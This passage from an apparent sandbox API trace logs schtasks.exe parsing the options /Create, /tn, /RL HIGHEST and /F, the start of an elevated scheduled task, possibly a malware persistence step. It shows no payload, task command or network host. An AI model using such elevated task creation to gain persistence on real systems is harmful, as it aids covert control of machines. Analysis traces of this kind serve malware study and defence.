_BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.800] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.800] lstrlenW (lpString="|?|") returned 3 [0287.800] lstrlenW (lpString="|RL|") returned 4 [0287.800] RtlRestoreLastWin32Error () returned 0x490 [0287.800] lstrlenW (lpString="create") returned 6 [0287.800] lstrlenW (lpString="create") returned 6 [0287.800] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] lstrlenW (lpString="RL") returned 2 [0287.800] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.800] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.800] lstrlenW (lpString="|create|") returned 8 [0287.800] lstrlenW (lpString="|RL|") returned 4 [0287.800] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0287.800] RtlRestoreLastWin32Error () returned 0x490 [0287.800] lstrlenW (lpString="delete") returned 6 [0287.800] lstrlenW (lpString="delete") returned 6 [0287.800] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] lstrlenW (lpString="RL") returned 2 [0287.800] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.800] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.800] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.800] lstrlenW (lpString="|delete|") returned 8 [0287.800] lstrlenW (lpString="|RL|") returned 4 [0287.800] StrStrIW (lpFirst="|delete|", lpSrch="|RL|") returned 0x0 [0287.800] RtlRestoreLastWin32Error () returned 0x490 [0287.801] lstrlenW (lpString="query") returned 5 [0287.801] lstrlenW (lpString="query") returned 5 [0287.801] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] lstrlenW (lpString="RL") returned 2 [0287.801] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.801] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.801] lstrlenW (lpString="|query|") returned 7 [0287.801] lstrlenW (lpString="|RL|") returned 4 [0287.801] StrStrIW (lpFirst="|query|", lpSrch="|RL|") returned 0x0 [0287.801] RtlRestoreLastWin32Error () returned 0x490 [0287.801] lstrlenW (lpString="change") returned 6 [0287.801] lstrlenW (lpString="change") returned 6 [0287.801] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] lstrlenW (lpString="RL") returned 2 [0287.801] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.801] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.801] lstrlenW (lpString="|change|") returned 8 [0287.801] lstrlenW (lpString="|RL|") returned 4 [0287.801] StrStrIW (lpFirst="|change|", lpSrch="|RL|") returned 0x0 [0287.801] RtlRestoreLastWin32Error () returned 0x490 [0287.801] lstrlenW (lpString="run") returned 3 [0287.801] lstrlenW (lpString="run") returned 3 [0287.801] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] lstrlenW (lpString="RL") returned 2 [0287.801] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.801] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.801] lstrlenW (lpString="|run|") returned 5 [0287.801] lstrlenW (lpString="|RL|") returned 4 [0287.801] StrStrIW (lpFirst="|run|", lpSrch="|RL|") returned 0x0 [0287.801] RtlRestoreLastWin32Error () returned 0x490 [0287.801] lstrlenW (lpString="end") returned 3 [0287.801] lstrlenW (lpString="end") returned 3 [0287.801] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] lstrlenW (lpString="RL") returned 2 [0287.801] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.801] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.801] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.801] lstrlenW (lpString="|end|") returned 5 [0287.801] lstrlenW (lpString="|RL|") returned 4 [0287.801] StrStrIW (lpFirst="|end|", lpSrch="|RL|") returned 0x0 [0287.801] RtlRestoreLastWin32Error () returned 0x490 [0287.801] lstrlenW (lpString="showsid") returned 7 [0287.801] lstrlenW (lpString="showsid") returned 7 [0287.801] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.802] lstrlenW (lpString="RL") returned 2 [0287.802] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.802] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.802] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|RL|") returned 4 [0287.802] lstrlenW (lpString="|showsid|") returned 9 [0287.802] lstrlenW (lpString="|RL|") returned 4 [0287.802] StrStrIW (lpFirst="|showsid|", lpSrch="|RL|") returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="/RL") returned 3 [0287.802] StrChrIW (lpStart="/RL", wMatch=0x3a) returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="/RL") returned 3 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="HIGHEST") returned 7 [0287.802] lstrlenW (lpString="-/") returned 2 [0287.802] StrChrIW (lpStart="-/", wMatch=0x52b0048) returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="HIGHEST") returned 7 [0287.802] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="HIGHEST") returned 7 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x0 [0287.802] lstrlenW (lpString="/F") returned 2 [0287.802] lstrlenW (lpString="-/") returned 2 [0287.802] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0287.802] lstrlenW (lpString="?") returned 1 [0287.802] lstrlenW (lpString="?") returned 1 [0287.802] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.802] lstrlenW (lpString="F") returned 1 [0287.802] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.802] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|?|") returned 3 [0287.802] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.802] lstrlenW (lpString="|?|") returned 3 [0287.802] lstrlenW (lpString="|F|") returned 3 [0287.802] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0287.802] RtlRestoreLastWin32Error () returned 0x490 [0287.802] lstrlenW (lpString="create") returned 6 [0287.802] lstrlenW (lpString="create") returned 6 [0287.802] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.803] lstrlenW (lpString="F") returned 1 [0287.803] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.803] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|create|") returned 8 [0287.803] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.803] lstrlenW (lpString="|create|") returned 8 [0287.803] lstrlenW (lpString="|F|") returned 3 [0287.803] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0287.803] RtlRestoreLastWin32Error () returned 0x490 [0287.803] lstrlenW (lpString="delete") returned 6 [0287.803] lstrlenW (lpString="delete") returned 6 [0287.803] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.803] lstrlenW (lpString="F") returned 1 [0287.803] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.803] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|delete|") returned 8 [0287.803] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.803] lstrlenW (lpString="|delete|") returned 8 [0287.803] lstrlenW (lpString="|F|") returned 3 [0287.960] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0287.960] RtlRestoreLastWin32Error () returned 0x490 [0287.960] lstrlenW (lpString="query") returned 5 [0287.960] lstrlenW (lpString="query") returned 5 [0287.960] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.960] lstrlenW (lpString="F") returned 1 [0287.960] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.960] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x8, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|query|") returned 7 [0287.960] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.960] lstrlenW (lpString="|query|") returned 7 [0287.960] lstrlenW (lpString="|F|") returned 3 [0287.960] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] lstrlenW (lpString="change") returned 6 [0287.961] lstrlenW (lpString="change") returned 6 [0287.961] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] lstrlenW (lpString="F") returned 1 [0287.961] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|change|") returned 8 [0287.961] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.961] lstrlenW (lpString="|change|") returned 8 [0287.961] lstrlenW (lpString="|F|") returned 3 [0287.961] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] lstrlenW (lpString="run") returned 3 [0287.961] lstrlenW (lpString="run") returned 3 [0287.961] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] lstrlenW (lpString="F") returned 1 [0287.961] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|run|") returned 5 [0287.961] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.961] lstrlenW (lpString="|run|") returned 5 [0287.961] lstrlenW (lpString="|F|") returned 3 [0287.961] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] lstrlenW (lpString="end") returned 3 [0287.961] lstrlenW (lpString="end") returned 3 [0287.961] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] lstrlenW (lpString="F") returned 1 [0287.961] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|end|") returned 5 [0287.961] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.961] lstrlenW (lpString="|end|") returned 5 [0287.961] lstrlenW (lpString="|F|") returned 3 [0287.961] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] lstrlenW (lpString="showsid") returned 7 [0287.961] lstrlenW (lpString="showsid") returned 7 [0287.961] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] lstrlenW (lpString="F") returned 1 [0287.961] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0287.961] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0xa, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|showsid|") returned 9 [0287.961] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xccf8b8 | out: _Buffer="|F|") returned 3 [0287.961] lstrlenW (lpString="|showsid|") returned 9 [0287.961] lstrlenW (lpString="|F|") returned 3 [0287.961] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] RtlRestoreLastWin32Error () returned 0x490 [0287.961] RtlRestoreLastWin32Error () returned 0x0 [0287.961] lstrlenW (lpString="/F") returned 2 [0287.962] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0287.962] RtlRestoreLastWin32Error () returned 0x490 [0287.962] RtlRestoreLastWin32Error () returned 0x0 [0287.962] lstrlenW (lpString="/F") returned 2 [0287.962] RtlRestoreLastWin32Error () returned 0x0 [0288.382] RtlRestoreLastWin32Error () returned 0x0 [0288.382] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0288.382] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0288.382] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0288.382] RtlVerifyVersionInfo (VersionInfo=0xcccc38, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0288.382] RtlRestoreLastWin32Error () returned 0x0 [0288.382] lstrlenW (lpString="create") returned 6 [0288.382] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0288.382] RtlRestoreLastWin32Error () returned 0x490 [0288.382] RtlRestoreLastWin32Error () returned 0x0 [0288.382] lstrlenW (lpString="create") returned 6 [0288.382] _memicmp (_Buf1=0xde7758, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.382] RtlRestoreLastWin32Error () returned 0x0 [0288.382] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.382] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xde9660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0288.382] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xcccd44 | out: lpdwHandle=0xcccd44) returned 0x76c [0288.382] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0xde9f68 | out: lpData=0xde9f68) returned 1 [0288.382] VerQueryValueW (in: pBlock=0xde9f68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcccd4c, puLen=0xcccd50 | out: lplpBuffer=0xcccd4c*=0xdea318, puLen=0xcccd50) returned 1 [0288.382] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.382] _vsnwprintf (in: _Buffer=0xde9660, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xcccd30 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0288.382] VerQueryValueW (in: pBlock=0xde9f68, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xcccd5c, puLen=0xcccd58 | out: lplpBuffer=0xcccd5c*=0xdea140, puLen=0xcccd58) returned 1 [0288.382] lstrlenW (lpString="schtasks.exe") returned 12 [0288.382] lstrlenW (lpString="schtasks.exe") returned 12 [0288.382] lstrlenW (lpString=".EXE") returned 4 [0288.382] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0288.382] lstrlenW (lpString="schtasks.exe") returned 12 [0288.382] lstrlenW (lpString=".EXE") returned 4 [0288.383] lstrlenW (lpString="schtasks") returned 8 [0288.383] lstrlenW (lpString="/create") returned 7 [0288.383] _memicmp (_Buf1=0xde7740, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.383] _vsnwprintf (in: _Buffer=0xde9660, _BufferCount=0x19, _Format="%s %s", _ArgList=0xcccd30 | out: _Buffer="schtasks /create") returned 16 [0288.383] _memicmp (_Buf1=0xde7710, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.383] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.383] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0288.383] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0288.383] _vsnwprintf (in: _Buffer=0xde3d78, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xcccd34 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0288.383] RtlRestoreLastWin32Error () returned 0x0 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="create") returned 6 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="?") returned 1 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="s") returned 1 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="u") returned 1 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="p") returned 1 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="ru") returned 2 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="rp") returned 2 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="sc") returned 2 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="mo") returned 2 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="d") returned 1 [0288.383] GetThreadLocale () returned 0x409 [0288.383] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.383] lstrlenW (lpString="m") returned 1 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="i") returned 1 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="tn") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="tr") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="st") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="sd") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="ed") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="it") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="et") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="k") returned 1 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="du") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="ri") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="z") returned 1 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="f") returned 1 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="v1") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="xml") returned 3 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="ec") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="rl") returned 2 [0288.384] GetThreadLocale () returned 0x409 [0288.384] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.384] lstrlenW (lpString="delay") returned 5 [0288.384] GetThreadLocale () returned 0x409 [0288.385] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.385] lstrlenW (lpString="np") returned 2 [0288.385] GetThreadLocale () returned 0x409 [0288.385] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0288.385] lstrlenW (lpString="hresult") returned 7 [0288.385] RtlRestoreLastWin32Error () returned 0x0 [0288.385] RtlRestoreLastWin32Error () returned 0x0 [0288.385] lstrlenW (lpString="/Create") returned 7 [0288.385] lstrlenW (lpString="-/") returned 2 [0288.385] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.385] lstrlenW (lpString="create") returned 6 [0288.385] lstrlenW (lpString="create") returned 6 [0288.385] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] lstrlenW (lpString="Create") returned 6 [0288.385] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.385] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|Create|") returned 8 [0288.385] lstrlenW (lpString="|create|") returned 8 [0288.385] lstrlenW (lpString="|Create|") returned 8 [0288.385] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0288.385] RtlRestoreLastWin32Error () returned 0x0 [0288.385] RtlRestoreLastWin32Error () returned 0x0 [0288.385] RtlRestoreLastWin32Error () returned 0x0 [0288.385] lstrlenW (lpString="/tn") returned 3 [0288.385] lstrlenW (lpString="-/") returned 2 [0288.385] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.385] lstrlenW (lpString="create") returned 6 [0288.385] lstrlenW (lpString="create") returned 6 [0288.385] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] lstrlenW (lpString="tn") returned 2 [0288.385] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 